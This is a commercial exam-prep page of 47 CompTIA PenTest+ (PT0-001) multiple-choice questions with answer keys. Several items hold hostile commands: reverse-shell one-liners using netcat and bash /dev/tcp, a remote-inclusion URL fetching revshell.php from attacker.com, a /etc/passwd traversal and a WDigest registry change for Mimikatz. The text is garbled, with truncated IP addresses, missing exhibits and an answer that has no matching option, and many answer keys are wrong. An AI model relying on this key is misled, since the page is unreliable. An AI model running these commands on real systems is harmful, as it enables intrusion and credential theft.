DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

CompTIA PT0-001 Exam Questions 2024 Updated: Get Ready for Exams, CompTIA PenTest+ Certification | SPOTO

Prepare for your CompTIA PenTest+ (PT0-001) certification with our 2024 Updated CompTIA PT0-001 Exam Questions. The best way to get ready for your exams is by practicing with the latest exam questions. Our practice tests cover a range of topics and scenarios, including hands-on testing in new environments such as the cloud and mobile platforms, in addition to traditional desktops and servers. By utilizing our exam questions, sample questions, and exam dumps, you'll gain the knowledge and confidence needed to succeed. Our mock exams and exam simulator provide a realistic exam experience to further enhance your preparation. Access our exam materials and exam answers to ensure you're fully prepared for the PT0-001 exam and earn your CompTIA PenTest+ certification with ease.
Take other online exams
Question #1
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
A. The client has applied a hot fix without updating the version
B. The threat landscape has significantly changed
C. The client has updated their codebase with new features
D. Thera are currently no known exploits for this vulnerability
View answer
Correct Answer: A
Question #2
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan. The tester runs the following command: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host
View answer
Correct Answer: A
Question #3
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
View answer
Correct Answer: D
Question #4
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
View answer
Correct Answer: B
Question #5
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
View answer
Correct Answer: A
Question #6
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
View answer
Correct Answer: B
Question #7
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. Implement new training to be aware of the risks in accessing the application
C. Implement an ACL to restrict access to the application exclusively to the finance department
D. Require payroll users to change the passwords used to authenticate to the application
View answer
Correct Answer: C
Question #8
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications
D. Search social media for information technology employees who post information about the technologies they work with
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
View answer
Correct Answer: DE
Question #9
Given the following script: Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
View answer
Correct Answer: C
Question #10
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
View answer
Correct Answer: C
Question #11
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
View answer
Correct Answer: A
Question #12
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
View answer
Correct Answer: BC
Question #13
Given the following: http://example.com/download.php?id-.../.../.../etc/passwd Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
View answer
Correct Answer: C
Question #14
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
A. Run the application through a dynamic code analyzer
B. Employ a fuzzing utility
C. Decompile the application
D. Check memory allocations
View answer
Correct Answer: D
Question #15
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist
B. Block URL redirections
C. Double URL encode the parameters
D. Stop external calls from the application
View answer
Correct Answer: B
Question #16
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
View answer
Correct Answer: AB
Question #17
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identity and eliminate inline SQL statements from the code
B. Identify and eliminate dynamic SQL from stored procedures
C. Identify and sanitize all user inputs
D. Use a whitelist approach for SQL statements
E. Use a blacklist approach for SQL statements
F. Identify the source of malicious input and block the IP address
View answer
Correct Answer: CD
Question #18
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
View answer
Correct Answer: A
Question #19
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. use auxiliary/server/socks4a
View answer
Correct Answer: A
Question #20
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks: Code review Updates to firewall settings Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
View answer
Correct Answer: A
Question #21
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
View answer
Correct Answer: B
Question #22
The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
View answer
Correct Answer: B
Question #23
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine
B. Disable remote logons for local administrators
C. Require multifactor authentication for all logins
D. Increase minimum password complexity requirements
E. Apply additional network access control
F. Enable full-disk encryption on every workstation
G. Segment each host into its own VLAN
View answer
Correct Answer: CDE
Question #24
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made public
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
View answer
Correct Answer: D
Question #25
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
A. Obtain staff information by calling the company and using social engineering techniques
B. Visit the client and use impersonation to obtain information from staff
C. Send spoofed emails to staff to see if staff will respond with sensitive information
D. Search the internet for information on staff such as social networking sites
View answer
Correct Answer: D
Question #26
Click the exhibit button. Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
A. Arbitrary code execution
B. Session hijacking
C. SQL injection
D. Login credential brute-forcing
E. Cross-site request forgery
View answer
Correct Answer: BD
Question #27
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
View answer
Correct Answer: D
Question #28
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
View answer
Correct Answer: A
Question #29
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
View answer
Correct Answer: D
Question #30
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM. Which of the following is MOST important for confirmation?
A. Unsecure service and protocol configuration
B. Running SMB and SMTP service
C. Weak password complexity and user account
D. Misconfiguration
View answer
Correct Answer: A
Question #31
Black box penetration testing strategy provides the tester with:
A. a target list
B. a network diagram
C. source code
D. privileged credentials
View answer
Correct Answer: D
Question #32
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
View answer
Correct Answer: A
Question #33
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
View answer
Correct Answer: D
Question #34
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method
B. HTTP OPTIONS method
C. HTTP PUT method
D. HTTP TRACE method
View answer
Correct Answer: A
Question #35
After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?
A. SOW
B. NDA
C. EULAD
View answer
Correct Answer: D
Question #36
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
View answer
Correct Answer: AC
Question #37
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
View answer
Correct Answer: A
Question #38
A penetration tester runs the following from a compromised ‘python -c ‘ import pty;pty.spawn (“/bin/bash”) ’. Which of the following actions are the tester taking?
A. Removing the Bash history
B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
View answer
Correct Answer: B
Question #39
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
View answer
Correct Answer: D
Question #40
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSDI broadcast flood
View answer
Correct Answer: B
Question #41
A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5 The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet
B. Nmap results contain a false positive for port 23
C. Port 22 was filtered
D. The service is running on a non-standard port
View answer
Correct Answer: A
Question #42
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
View answer
Correct Answer: A
Question #43
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i:
B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST
C. Download the GHOST file to a Linux system and compile gcc -o GHOST
D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i:
View answer
Correct Answer: C
Question #44
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
A. Horizontally escalate privileges
B. Scrape the page for hidden fields
C. Analyze HTTP response code
D. Search for HTTP headers
View answer
Correct Answer: D
Question #45
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
View answer
Correct Answer: D
Question #46
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
View answer
Correct Answer: A
Question #47
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
View answer
Correct Answer: B

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.